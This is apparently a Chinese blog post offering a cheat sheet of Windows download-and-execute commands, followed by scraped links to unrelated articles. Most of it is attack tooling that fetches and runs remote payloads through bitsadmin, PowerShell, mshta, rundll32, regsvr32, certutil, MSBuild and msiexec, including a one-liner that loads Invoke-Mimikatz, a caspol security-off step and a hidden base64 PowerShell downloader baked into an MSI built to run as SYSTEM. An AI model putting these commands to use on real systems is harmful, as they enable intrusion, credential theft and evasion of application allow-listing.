windows下载执行命令大全
1.bitsadmin命令(只能命令下载到指定路径上,win7以上):
bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg"
bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe
2.powershell命名下载执行:(win7以上)
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz powershell -exec bypass -f \\webdavserver\folder\payload.ps1 powershell (new-object System.Net.WebClient).DownloadFile( ‘http://192.168.168.183/1.exe’,’C:\111111111111111.exe’) powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\\1.jpg')
3.mshta命令下载执行
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) mshta http://webserver/payload.hta --->短域名:http://sina.lt/-->mshta http://t.cn/RYUQyF8 mshta \\webdavserver\folder\payload.hta
payload.hta
<HTML> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <HEAD> <script language="VBScript"> Window.ReSizeTo , Window.moveTo -,- Set objShell = CreateObject("Wscript.Shell") objShell.Run "calc.exe" self.close </script> <body> demo </body> </HEAD> </HTML>
4.rundll32命令下载执行
rundll32 \\webdavserver\folder\payload.dll,entrypoint rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
参考:https://github.com/3gstudent/Javascript-Backdoor
5.net中的regasm命令下载执行
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
6.cmd的远程命令下载:
cmd.exe /k < \\webdavserver\folder\batchfile.txt
7.regsvr32命令下载执行
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
js.png
<?XML version="1.0"?> <scriptlet> <registration progid="ShortJSRAT" classid="{10001111-0000-0000-0000-0000FEEDACDC}" > <!-- Learn from Casey Smith @subTee --> <script language="JScript"> <![CDATA[ ps = "cmd.exe /c calc.exe"; new ActiveXObject("WScript.Shell").Run(ps,,true); ]]> </script> </registration> </scriptlet>
8.certutil命令下载执行
certutil -urlcache -split -f http://webserver/payload payload certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe certutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
9.net中的MSBulid命令下载执行
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
10. odbcconf命令下载执行
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
11.cscript脚本远程命令下载执行
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec3.sct cscript //E:jscript \\webdavserver\folder\payload.txt
downfile.vbs:
' Set your settings strFileURL = "http://www.it1.net/images/it1_logo2.jpg" strHDLocation = "c:\logo.jpg" ' Fetch the file Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") objXMLHTTP.open "GET", strFileURL, false objXMLHTTP.send() If objXMLHTTP.Status = Then Set objADOStream = CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type = 'adTypeBinary objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 'Set the stream position to the start Set objFSO = Createobject("Scripting.FileSystemObject") If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing
将以上保存为downfile.vbs
输入命令:cscript downfile.vbs
12.pubprn.vbs下载执行命令
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
13.windows自带命令copy
copy \\x.x.x.x\xx\poc.exe xcopy d:\test.exe \\x.x.x.x\test.exe
14. IEXPLORE.EXE命令下载执行(需要IE存在oday)
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://site.com/exp
15.IEEXC命令下载执行
C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec http://site.com/files/test64.exe
参考:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
16. msiexec命令下载执行
msiexec /q /i http://site.com/payloads/calc.png
该方法我之前的两篇文章《渗透测试中的msiexec》《渗透技巧——从Admin权限切换到System权限》有过介绍,细节不再赘述
首先将powershell实现下载执行的代码作base64编码:
$fileContent = "(new-object System.Net.WebClient).DownloadFile('https://github.com/3gstudent/test/raw/master/putty.exe','c:\download\a.exe');start-process 'c:\download\a.exe'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent);
$encoded = [System.Convert]::ToBase64String($bytes);
$encoded
得到:
KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
完整powershell命令为:
powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
完整wix文件为:
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product
Name" Version="0.0." Manufacturer="@_xpn_" Language="">
<Package InstallerVersion="" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="" />
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR"
ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
invalid vbs to fail install
</CustomAction>
<InstallExecuteSequence>
<Custom Action="SystemShell" After="InstallInitialize"></Custom>
<Custom Action="FailInstall" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>
将其编译,生成msi文件,命令如下:
candle.exe msigen.wix light.exe msigen.wixobj
生成test.msi
实现功能:
msiexec /q /i https://github.com/3gstudent/test/raw/master/test.msi
注:
执行后需要手动结束进程msiexec.exe
结合百度提供的短地址服务(http://dwz.cn/), 实现代码为34个字符,代码如下:
msiexec /q /i http://dwz.cn/6UJpF8
17.下载命令执行项目GreatSCT
windows下载执行命令大全的更多相关文章
- Windows:FTP命令大全
Windows:FTP命令大全 简介 1, open:与服务器相连接: 2, send(put):上传文件: 3,get:下载文件: 4,mget:下载多个文件: 用法: mget *:下载当前路径下 ...
- Windows常用shell命令大全
Windows常用shell命令大全 基于鼠标操作的后果就是OS界面外观发生改变, 就得多花学习成本.更主要的是基于界面引导Path与命令行直达速度是难以比拟的.另外Geek很大一部分是键盘控,而非鼠 ...
- Windows常用shell命令大全(转)
[Windows常用shell命令大全] 基于鼠标操作的后果就是OS界面外观发生改变, 就得多花学习成本.更主要的是基于界面引导Path与命令行直达速度是难以比拟的.另外Geek很大一部分是键盘控,而 ...
- Windows 7运行命令大全
Windows 7运行命令大全,小编整理了常用的45个Win7运行命令分享给大家:1.cleanmgr:打开磁盘清理工具 2.compmgmt.msc:计算机管理 3.conf:启动系统配置实用程序 ...
- Windows下载 Curl 命令
Windows下载 Curl 命令 描述: 不仅Linux命令行可以使用curl命令下载软件, Windows系统的cmd命令窗口也可以使用curl命令下载,并且更稳定. 原文作者:Wayne Zhu ...
- python paramiko实现ssh上传下载执行命令
paramiko ssh上传下载执行命令 序言 最近项目经常需要动态在跳板机上登录服务器进行部署环境,且服务器比较多,每次完成所有服务器到环境部署执行耗费大量时间.为了解决这个问题,根据所学的执行实现 ...
- Windows CMD常用命令大全 运行命令
http://blog.163.com/lixunhuan@126/blog/static/122060620075124142658/ CMD命令大全 net use \\ip\ipc$ " ...
- FW Windows下DOS命令大全(经典收藏)---mklink
dos command port-->PID: netstat -ano | findstr port | tasklist |findstr "" Windows SYST ...
- Windows 经典DOS命令大全
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: xcopy 要复制的文件或 ...
随机推荐
- selenium webdriver API详解(一)
本系列主要讲解webdriver常用的API使用方法(注意:使用前请确认环境是否安装成功,浏览器驱动是否与谷歌浏览器版本对应) 一:打开某个网址:get() from selenium import ...
- vue Map 渲染DOM
遍历对象(map),以键值对k:v的形式渲染DOM (1)DOM (2)数据模板
- mongo复杂操作
相比关系型数据库, Array [1,2,3,4,5] 和 Object { 'name':'DragonFire' } 是MongoDB 比较特殊的类型了 特殊在哪里呢?在他们的操作上又有什么需要注 ...
- html页面中完成查找功能
最近在搞一个被很多人改了的框架,天天看代码看的头的晕了,不过感觉进步还挺大的,自己做了一个后台可配置前台查看两个库不同数据范围的东西,还挺满意,那天拿出来分享一下,今天先说一个这几天做的功能,就是ht ...
- rz和sz上传下载文件
安装软件包 yum install lrzsz 上传文件,输入rz选择文件上传(可以按住shift键多选) # rz sz 下载文件到本地,选择保存文件夹 # sz dd xshell设 ...
- hibernate.hbm.xml文件配置入门小结(1)
在Hibernate中,各表的映射文件xxx.hbm.xml可以通过工具生成,例如在使用MyEclipse开发时,它提供了自动生成映射文件的工具. hibernate.hbm.xml文件的基本结构如下 ...
- Python3基础-表达式和运算符
表达式和运算符 什么是表达式? 1+2*3就是一个表达式,这里的加号和乘号叫做运算符,1.2.3叫做操作数. 1+2*3经过计算后得到的结果是7,我们可以将计算结果存放在一个变量里,result=1+ ...
- Alpha阶段第2周/共2周 Scrum立会报告+燃尽图 02
此次作业要求参见 [https://edu.cnblogs.com/campus/nenu/2018fall/homework/2285] Scrum master:祁玉 一.小组介绍 组长:王一可 ...
- 王者荣耀交流协会-Alpha发布用户使用报告
用户数量:10人 姓名如下(包括化名):张小斌.王瑞瑞.蛋蛋.小美.晨曦.小丽.张利刚.小闫.小谢.小崔 寻找的用户多为王者荣耀交流协会成员的同学,对管理时间有着强烈的需求,也对PSP Daily软件 ...
- 04慕课网《进击Node.js基础(一)》HTTP讲解
HTTP:通信协议 流程概述: http客户端发起请求,创建端口默认8080 http服务器在端口监听客户端请求 http服务器向客户端返回状态和内容 稍微详细解析: 1.域名解析:浏览器搜素自身的D ...